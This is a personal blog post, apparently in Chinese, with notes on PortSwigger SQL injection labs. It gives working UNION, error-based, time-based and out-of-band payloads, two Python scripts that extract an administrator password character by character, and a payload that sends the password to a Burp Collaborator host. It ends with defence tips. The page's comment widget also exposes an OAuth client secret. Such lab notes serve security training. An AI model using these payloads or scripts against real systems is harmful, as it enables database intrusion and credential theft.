<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>Burpsuite靶场----SQL注入专题 - 秋秋晚</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="秋秋晚"><meta name="msapplication-TileImage" content="https://tva1.sinaimg.cn/large/e6c9d24egy1h23f8ujgnpj208c08ca9x.jpg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="秋秋晚"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="这里主要是个人笔记，记录一些我个人要记录的点，不算是完整的write up burpsuite给了一个很好的各种sql语句差别的整合 https:&amp;#x2F;&amp;#x2F;portswigger.net&amp;#x2F;web-security&amp;#x2F;sql-injection&amp;#x2F;cheat-sheet"><meta property="og:type" content="blog"><meta property="og:title" content="秋秋晚"><meta property="og:url" content="https://lhxhl.github.io/"><meta property="og:site_name" content="秋秋晚"><meta property="og:description" content="这里主要是个人笔记，记录一些我个人要记录的点，不算是完整的write up burpsuite给了一个很好的各种sql语句差别的整合 https:&amp;#x2F;&amp;#x2F;portswigger.net&amp;#x2F;web-security&amp;#x2F;sql-injection&amp;#x2F;cheat-sheet"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://tva1.sinaimg.cn/large/e6c9d24egy1h23g1fyyodj20jg0jgwfd.jpg"><meta property="article:published_time" content="2022-03-02T12:36:45.594Z"><meta property="article:modified_time" content="2022-05-09T05:51:57.638Z"><meta property="article:author" content="秋秋晚"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="https://tva1.sinaimg.cn/large/e6c9d24egy1h23g1fyyodj20jg0jgwfd.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://lhxhl.github.io/2022/03/02/burp_sql/"},"headline":"秋秋晚","image":["https://tva1.sinaimg.cn/large/e6c9d24egy1gzxssr6fqdj20pq0b80tw.jpg","https://tva1.sinaimg.cn/large/e6c9d24egy1gzyuok4asij214t0u079v.jpg","https://tva1.sinaimg.cn/large/e6c9d24egy1gzyy50zhkpj216b0u0n3q.jpg","https://tva1.sinaimg.cn/large/e6c9d24egy1gzz0cr9jkbj214t0u0jxd.jpg","https://tva1.sinaimg.cn/large/e6c9d24egy1gzz3bhnhq8j213q07amxk.jpg","https://tva1.sinaimg.cn/large/e6c9d24egy1gzz3bsxoi0j21000min1u.jpg","https://tva1.sinaimg.cn/large/e6c9d24egy1gzz42pz9frj212p0u0gpl.jpg","https://tva1.sinaimg.cn/large/e6c9d24egy1gzz47o9jv5j21cg0p8n1q.jpg","https://tva1.sinaimg.cn/large/e6c9d24egy1gzz4h1irvwj210e078wfe.jpg"],"datePublished":"2022-03-02T12:36:45.594Z","dateModified":"2022-05-09T05:51:57.638Z","author":{"@type":"Person","name":"秋秋晚"},"description":"这里主要是个人笔记，记录一些我个人要记录的点，不算是完整的write up burpsuite给了一个很好的各种sql语句差别的整合 https:&#x2F;&#x2F;portswigger.net&#x2F;web-security&#x2F;sql-injection&#x2F;cheat-sheet"}</script><link rel="canonical" href="https://lhxhl.github.io/2022/03/02/burp_sql/"><link rel="icon" href="https://tva1.sinaimg.cn/large/e6c9d24egy1h23f8ujgnpj208c08ca9x.jpg"><meta name="referrer" content="no-referrer-when-downgrade"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><meta name="generator" content="Hexo 6.1.0"></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">秋秋晚</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Join Gitter" href="https://gitter.im/hexo-theme-amazing/community"><i class="fab fa-gitter"></i></a><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/removeif/hexo-theme-amazing"><i class="fab fa-github"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><!--!--><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><i class="far fa-calendar-plus"> </i>2022-03-02  <a class="commentCountImg" href="/2022/03/02/burp_sql/#comment-container"><span class="display-none-class">e9fc3afd0e6f887c3c63550ffd70d2b7</span><i class="far fa-comment-dots"></i> <span class="commentCount" id="e9fc3afd0e6f887c3c63550ffd70d2b7">99+</span>  </a><span class="level-item"><i class="far fa-clock"> </i>11 分钟  <i class="fas fa-pencil-alt"> </i>1.7 k</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">Burpsuite靶场----SQL注入专题</h1><div class="content"><hr>
<p><strong>这里主要是个人笔记，记录一些我个人要记录的点，不算是完整的write up</strong></p>
<p><strong>burpsuite给了一个很好的各种sql语句差别的整合</strong></p>
<p><strong><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/sql-injection/cheat-sheet">https://portswigger.net/web-security/sql-injection/cheat-sheet</a></strong></p>
<span id="more"></span>

<h1 id="Lab-SQL-injection-attack-querying-the-database-type-and-version-on-Oracle"><a href="#Lab-SQL-injection-attack-querying-the-database-type-and-version-on-Oracle" class="headerlink" title="Lab: SQL injection attack, querying the database type and version on Oracle"></a>Lab: SQL injection attack, querying the database type and version on Oracle</h1><p><strong>在oracle数据库中，每个select语句后都必须指定选择的表名，恰好oracle中有一个内置的<code>dual</code>表</strong></p>
<p><strong>可以尝试这样</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27; union select &#x27;</span>lnk<span class="string">&#x27;,&#x27;</span>zing<span class="string">&#x27; from dual --</span></span><br></pre></td></tr></table></figure>

<p><strong>查询oracle数据库版本</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> banner <span class="keyword">FROM</span> v$version</span><br><span class="line"><span class="keyword">SELECT</span> version <span class="keyword">FROM</span> v$instance</span><br></pre></td></tr></table></figure>

<p><strong>payload</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27; union select banner,&#x27;</span>cnc<span class="string">&#x27; from v$version --</span></span><br></pre></td></tr></table></figure>

<h1 id="SQL-injection-attack-listing-the-database-contents-on-Oracle"><a href="#SQL-injection-attack-listing-the-database-contents-on-Oracle" class="headerlink" title="SQL injection attack, listing the database contents on Oracle"></a>SQL injection attack, listing the database contents on Oracle</h1><p><strong>查询oracle数据库的的表和段</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> all_tables</span><br><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> all_tab_columns <span class="keyword">WHERE</span> table_name <span class="operator">=</span> <span class="string">&#x27;TABLE-NAME-HERE&#x27;</span></span><br></pre></td></tr></table></figure>

<h1 id="Lab-Blind-SQL-injection-with-conditional-responses"><a href="#Lab-Blind-SQL-injection-with-conditional-responses" class="headerlink" title="Lab: Blind SQL injection with conditional responses"></a>Lab: Blind SQL injection with conditional responses</h1><p><strong>盲注脚本</strong></p>
<p><strong>其实用burpsuite跑很快就跑出结果了，python会慢一些，但是burp不能把字符串拼接起来</strong></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">blind_sql_injection</span>(<span class="params">url, length</span>):</span><br><span class="line">    password = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    headers = &#123;&#125;</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, length+<span class="number">1</span>):</span><br><span class="line">        base_cookie = <span class="string">f&quot;TrackingId=XN8KvPf0TbIGabZ6&#x27; and (select ascii(substring(password, %s, 1)) from users where username=&#x27;administrator&#x27; )=&#x27;[char]&#x27; --; session=aMdbiac40Bds8bKv3FE85vvVBsjwscrK&quot;</span> % <span class="built_in">str</span>(i)</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>, <span class="number">123</span>):</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;payload--&gt;digit:%s with &quot;</span> % <span class="built_in">str</span>(i), <span class="built_in">chr</span>(j))</span><br><span class="line">            cookie = base_cookie.replace(<span class="string">&quot;[char]&quot;</span>, <span class="built_in">str</span>(j))</span><br><span class="line">            headers[<span class="string">&#x27;cookie&#x27;</span>] = cookie</span><br><span class="line">            r = requests.get(url, headers=headers)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;Welcome back&quot;</span> <span class="keyword">in</span> r.content.decode(<span class="string">&#x27;utf-8&#x27;</span>):</span><br><span class="line">                password += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;password--&gt;&quot;</span>, password)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;https://ac241fb81ede6a4cc09132c900460036.web-security-academy.net/&quot;</span></span><br><span class="line">blind_sql_injection(url, <span class="number">20</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>这里我就只截一部分图了，懒得跑下去了，太慢了</strong></p>
<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzxssr6fqdj20pq0b80tw.jpg"></p>
<h1 id="Lab-Blind-SQL-injection-with-conditional-errors"><a href="#Lab-Blind-SQL-injection-with-conditional-errors" class="headerlink" title="Lab: Blind SQL injection with conditional errors"></a>Lab: Blind SQL injection with conditional errors</h1><p><strong>错误条件的盲注</strong></p>
<p>首先加单引号报错，然后加个注释发现正常，所以判断SQL语句为</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> trick_id <span class="keyword">from</span> trick_tab <span class="keyword">where</span> trick<span class="operator">=</span><span class="string">&#x27;vQdcV0dBQuBUyGx9&#x27;</span></span><br></pre></td></tr></table></figure>

<p>然后判断数据库，首先查询一个空值</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27; union select &#x27;&#x27; --</span></span><br></pre></td></tr></table></figure>

<p>然后尝试oracle的dual表</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27; union select &#x27;&#x27; from dual --</span></span><br></pre></td></tr></table></figure>

<p>页面正常，所以数据库为oracle</p>
<p>接着我们尝试去一个不存在的表中查询，发现又报错，这个很明显后端在把我们输入的语句当作代码执行</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="string">&#x27;&#x27;</span> <span class="keyword">from</span> lnk</span><br></pre></td></tr></table></figure>

<p><strong>这题和上面类似，只是将响应字符串取代为报错响应</strong></p>
<p><strong>于是我们参考构造payload</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27; union select case when(1=1) then to_char(1/0) else null end from users --</span></span><br></pre></td></tr></table></figure>

<p><strong>值得注意的是，当when中条件为真时，返回500，为假时，页面才是正常，这和上面刚好是相反的</strong></p>
<p>一样的，首先用burp爆破出密码长度</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&#x27; union select case when(username=&#x27;administrator&#x27; and length(password)=1) then to_char(1/0) else null end from users --</span><br></pre></td></tr></table></figure>

<p>结果如下，长度是20</p>
<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzyuok4asij214t0u079v.jpg"></p>
<p><strong>exp</strong></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">blind_sql_injection</span>(<span class="params">url, length</span>):</span><br><span class="line">	password = <span class="string">&#x27;&#x27;</span></span><br><span class="line">	headers = &#123;&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, length + <span class="number">1</span>):</span><br><span class="line">		base_cookie = <span class="string">f&quot;TrackingId=PnmnAqssW0voE21g&#x27; union select case when (username=&#x27;administrator&#x27; and ascii(substr(password, %s, 1))=[char]) then to_char(1/0) else null end from users --; session=ZTFD8NTb6aoJjWU0ENRuwMHso9ySKox2&quot;</span> % <span class="built_in">str</span>(i)</span><br><span class="line">		<span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>, <span class="number">123</span>):</span><br><span class="line">			<span class="built_in">print</span>(<span class="string">&quot;payload--&gt;digit%s with &quot;</span> % <span class="built_in">str</span>(i), <span class="built_in">chr</span>(j))</span><br><span class="line">			cookie = base_cookie.replace(<span class="string">&quot;[char]&quot;</span>, <span class="built_in">str</span>(j))</span><br><span class="line">			headers[<span class="string">&quot;cookie&quot;</span>] = cookie</span><br><span class="line">			r = requests.get(url, headers=headers)</span><br><span class="line">			<span class="keyword">if</span> <span class="number">500</span> == r.status_code:</span><br><span class="line">				password += <span class="built_in">chr</span>(j)</span><br><span class="line">				<span class="keyword">break</span></span><br><span class="line">		<span class="built_in">print</span>(<span class="string">&quot;password--&gt;&quot;</span>, password)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;https://ac6d1f6a1ea307acc1c50c14006000ca.web-security-academy.net/&quot;</span></span><br><span class="line">length = <span class="number">20</span></span><br><span class="line">blind_sql_injection(url, length)</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h1 id="Lab-Blind-SQL-injection-with-time-delays-and-information-retrieval"><a href="#Lab-Blind-SQL-injection-with-time-delays-and-information-retrieval" class="headerlink" title="Lab: Blind SQL injection with time delays and information retrieval"></a>Lab: Blind SQL injection with time delays and information retrieval</h1><p><strong>时间盲注，用burp cheat sheet给的payload fuzz下数据库，发现是PostgreSQL</strong></p>
<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzyy50zhkpj216b0u0n3q.jpg"></p>
<p><strong>接着用类似的payload测试延时注入</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27; || (select case when (1=1) then pg_sleep(1) else pg_sleep(0) end from users) --</span></span><br></pre></td></tr></table></figure>

<p>burp测试一下，password长度还是20</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27; || (select case when (username=&#x27;</span>administrator<span class="string">&#x27; and length(password)=20) then pg_sleep(1) else pg_sleep(0) end from users) --</span></span><br></pre></td></tr></table></figure>

<p>这里python脚本的timeout和sleep不太一样，我暂时还爆破不出来，如果有知道的师傅希望能告诉我一下（🏀⚽️了</p>
<p>用burp爆破只能开1个线程，开多了也会导致有错误，反正就挺恶心挺费时的这题</p>
<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzz0cr9jkbj214t0u0jxd.jpg"></p>
<p>payload</p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="string">&#x27;+||+(select+case+when+(username=&#x27;</span>administrator<span class="string">&#x27;+and+substring(password,§1§,1)=&#x27;</span>§a§<span class="string">&#x27;)+then+pg_sleep(2)+else+pg_sleep(0)+end+from+users)+--</span></span><br></pre></td></tr></table></figure>

<h1 id="Lab-Blind-SQL-injection-with-out-of-band-interaction"><a href="#Lab-Blind-SQL-injection-with-out-of-band-interaction" class="headerlink" title="Lab: Blind SQL injection with out-of-band interaction"></a>Lab: Blind SQL injection with out-of-band interaction</h1><h2 id="利用带外-OAST-技术发动盲注"><a href="#利用带外-OAST-技术发动盲注" class="headerlink" title="利用带外(OAST)技术发动盲注"></a>利用带外(OAST)技术发动盲注</h2><p><strong>点击burp的Burp Coolaborator client生成一个临时地址，发送给你的好友，他们点击之后就会收到一些信息</strong></p>
<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzz3bhnhq8j213q07amxk.jpg"></p>
<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzz3bsxoi0j21000min1u.jpg"></p>
<p><strong>看ua头可以看到对方的一些设备基本信息</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">TrackingId<span class="operator">=</span>x<span class="string">&#x27;+UNION+SELECT+EXTRACTVALUE(xmltype(&#x27;</span><span class="operator">&lt;</span><span class="operator">%</span><span class="number">3</span>fxml<span class="operator">+</span>version<span class="operator">%</span><span class="number">3</span>d&quot;1.0&quot;<span class="operator">+</span>encoding<span class="operator">%</span><span class="number">3</span>d&quot;UTF-8&quot;<span class="operator">%</span><span class="number">3</span>f<span class="operator">&gt;</span><span class="operator">&lt;</span><span class="operator">!</span>DOCTYPE<span class="operator">+</span>root<span class="operator">+</span>[<span class="operator">+</span><span class="operator">&lt;</span><span class="operator">!</span>ENTITY<span class="operator">+</span><span class="operator">%</span><span class="number">25</span><span class="operator">+</span>remote<span class="operator">+</span><span class="keyword">SYSTEM</span><span class="operator">+</span>&quot;http%3a//YOUR-COLLABORATOR-ID.burpcollaborator.net/&quot;<span class="operator">&gt;</span><span class="operator">+</span><span class="operator">%</span><span class="number">25</span>remote<span class="operator">%</span><span class="number">3</span>b]<span class="operator">&gt;</span><span class="string">&#x27;),&#x27;</span><span class="operator">/</span>l<span class="string">&#x27;)+FROM+dual--</span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></figure>

<p>这个是burp给的一个payload模板，打过去就可过这个lab</p>
<p><strong>第二个实验就是用oast技术泄漏出信息</strong></p>
<p><strong>我们可以在上面模板中的域名里写入sql语句带出查询的数据</strong></p>
<p><strong>payload</strong></p>
<figure class="highlight sql"><table><tr><td class="code"><pre><span class="line">x<span class="string">&#x27;+UNION+SELECT+EXTRACTVALUE(xmltype(&#x27;</span><span class="operator">&lt;</span><span class="operator">%</span><span class="number">3</span>fxml<span class="operator">+</span>version<span class="operator">%</span><span class="number">3</span>d&quot;1.0&quot;<span class="operator">+</span>encoding<span class="operator">%</span><span class="number">3</span>d&quot;UTF-8&quot;<span class="operator">%</span><span class="number">3</span>f<span class="operator">&gt;</span><span class="operator">&lt;</span><span class="operator">!</span>DOCTYPE<span class="operator">+</span>root<span class="operator">+</span>[<span class="operator">+</span><span class="operator">&lt;</span><span class="operator">!</span>ENTITY<span class="operator">+</span><span class="operator">%</span><span class="number">25</span><span class="operator">+</span>remote<span class="operator">+</span><span class="keyword">SYSTEM</span><span class="operator">+</span>&quot;http%3a//&#x27;||(select password from users where username=&#x27;administrator&#x27;)||&#x27;~cp5gpi5bar1xg1c1n8t3ehnk5bb1zq.burpcollaborator.net/&quot;<span class="operator">&gt;</span><span class="operator">+</span><span class="operator">%</span><span class="number">25</span>remote<span class="operator">%</span><span class="number">3</span>b]<span class="operator">&gt;</span><span class="string">&#x27;),&#x27;</span><span class="operator">/</span>l<span class="string">&#x27;)+FROM+dual--</span></span><br></pre></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzz42pz9frj212p0u0gpl.jpg"></p>
<p><strong>这样就带出了密码</strong></p>
<h1 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h1><p><strong>burp的这张图很形象的展示了二次注入的基本利用</strong></p>
<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzz47o9jv5j21cg0p8n1q.jpg"></p>
<p><strong>首先查询一个正常的，接着以分号为界，后面的又会被当作sql语句去执行</strong></p>
<h1 id="总结和检测sql注入以及防御"><a href="#总结和检测sql注入以及防御" class="headerlink" title="总结和检测sql注入以及防御"></a>总结和检测sql注入以及防御</h1><ul>
<li><strong>可以通过工具比如burp和sqlmap进行检测sql注入</strong></li>
<li><strong>添加单引号’等字符查看是否有报错信息</strong></li>
<li><strong>提交一些特定sql语句，输入一些基本的值和其他的值，观察系统页面响应是否有变化或者差异</strong></li>
<li><strong>利用bool条件<code>or 1 = 1</code> 和<code>or 1 = 2</code>判断页面响应是否不一样</strong></li>
<li><strong>提交一些触发延时的payload看页面响应是否同延时有关</strong></li>
<li><strong>利用OAST payloads ，监视是否有交互</strong></li>
</ul>
<p><strong>一些sql注入的点</strong></p>
<p><img src="https://tva1.sinaimg.cn/large/e6c9d24egy1gzz4h1irvwj210e078wfe.jpg"></p>
<h2 id="一些数据库的不同造成的差异"><a href="#一些数据库的不同造成的差异" class="headerlink" title="一些数据库的不同造成的差异"></a>一些数据库的不同造成的差异</h2><p><strong><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/sql-injection/cheat-sheet">依然是这个链接</a></strong></p>
<h2 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h2><ul>
<li><strong>一般大部分的sql注入都可以通过预处理语句就是参数化查询来避免</strong></li>
<li><strong>完善白黑名单</strong></li>
<li><strong>关闭错误提示</strong></li>
<li><strong>统一编码</strong></li>
<li><strong>闭合可控的变量，并且转义</strong></li>
<li><strong>安装WAF</strong></li>
</ul>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><strong><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/sql-injection">portswigger sql靶场</a></strong></p>
<p><strong><a target="_blank" rel="noopener" href="https://www.0x002.com/2020/%E5%AF%B9MYSQL%E6%B3%A8%E5%85%A5%E7%9B%B8%E5%85%B3%E5%86%85%E5%AE%B9%E5%8F%8A%E9%83%A8%E5%88%86Trick%E7%9A%84%E5%BD%92%E7%B1%BB%E5%B0%8F%E7%BB%93/">对MYSQL注入相关内容及部分Trick的归类小结</a></strong></p>
<p><strong><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/245532#h2-43">梨子带你刷burpsuite靶场系列之服务器端漏洞篇 - Sql注入专题</a></strong></p>
<p><strong><a target="_blank" rel="noopener" href="https://victomteng1997.github.io/2020/07/08/Web-Security-Academy-SQL-Injection-2/">sql盲注python脚本</a></strong></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>Burpsuite靶场----SQL注入专题</p><p><a href="https://lhxhl.github.io/2022/03/02/burp_sql/">https://lhxhl.github.io/2022/03/02/burp_sql/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><a href="https://lhxhl.github.io"><p>秋秋晚</p></a></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2022-03-02</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2022-05-09</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a class="icon" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a><a class="icon" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="recommend-area"><div class="recommend-post"><span class="is-size-6 has-text-grey has-mr-7"># 相关文章</span><br><span>  1.<a class="is-size-6" href="/2022/05/15/thisismysql/" target="_blank">NSSRound3---This1sMysql 复现</a><br></span><span>  2.<a class="is-size-6" href="/2022/04/19/*CTF2022/" target="_blank">🌟CTF2022-Web部分WriteUp</a><br></span><span>  3.<a class="is-size-6" href="/2022/03/24/wyy/" target="_blank">爬取网易云评论数据</a><br></span><span>  4.<a class="is-size-6" href="/2022/03/14/burp_unser/" target="_blank">Burpsuite---反序列化专题</a><br></span><span>  5.<a class="is-size-6" href="/2022/03/12/burp_file_upload/" target="_blank"> </a><br></span><span>  6.<a class="is-size-6" href="/2022/03/12/burp_ssrf/" target="_blank">Burpsuite---SSRF专题</a><br></span><span>  7.<a class="is-size-6" href="/2022/03/10/burp_os/" target="_blank">Burpsuite靶场---命令注入专题</a><br></span><span>  8.<a class="is-size-6" href="/2022/03/10/burp_dir_tra/" target="_blank">Burpsuite靶场---目录穿越专题</a><br></span></div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3><div class="buttons is-centered"><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>支付宝</span><span class="qrcode"><img src="/" alt="支付宝"></span></a><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>微信</span><span class="qrcode"><img src="/" alt="微信"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2022/03/03/ciscn_19_s_3/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">CISCN 2019华南 PWN3</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2022/02/12/fmt_bss/"><span class="level-item">格式化字符串在bss段的利用</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--><div class="card"><div class="card-content"><div class="title is-5">评论</div><div id="comment-container"></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/gitalk/1.6.0/gitalk.css"><script> $.getScript('/js/gitalk.min.js', function () { 
            var gitalk = new Gitalk({
            language:'zh-CN',
            id: 'e9fc3afd0e6f887c3c63550ffd70d2b7',
            repo: 'blog_comment',
            owner: 'LHXHL',
            clientID: '9901fc9cd07fca97d9c5',
            clientSecret: '676e4024a92c4843a002172e7c57dd2a9875f238',
            admin: ["LHXHL"],
            createIssueManually: true,
            distractionFreeMode: false,
            perPage: 10,
            pagerDirection: 'last',
            proxy: 'https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token',
            
            enableHotKey: true,
            isLocked: false
        })
        gitalk.render('comment-container')});</script></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1 is-sticky"><!--!--><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="https://tva1.sinaimg.cn/large/e6c9d24egy1h23g1fyyodj20jg0jgwfd.jpg" alt="秋秋晚"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">秋秋晚</p><p class="is-size-6 is-block">Web &amp;&amp; Pentest &amp;&amp; Moonlight</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>白玉盘</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">22</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories"><p class="title">0</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags"><p class="title">0</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/LHXHL" target="_blank" rel="noopener">关注我</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/LHXHL"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div><div><hr><p id="hitokoto">:D 一言句子获取中...</p><script type="text/javascript" defer>function getYiyan(){
                                $.getJSON("https://v1.hitokoto.cn/", function (data) {
                                if(data){
                                    $('#hitokoto').html("");
                                    $('#hitokoto').append("<strong style='color: #3273dc;'>"+data.hitokoto+"</strong>"+
                                    "<p>"+"来源《"+data.from+"》</p><p>提供者-"+data.creator+"</p>");
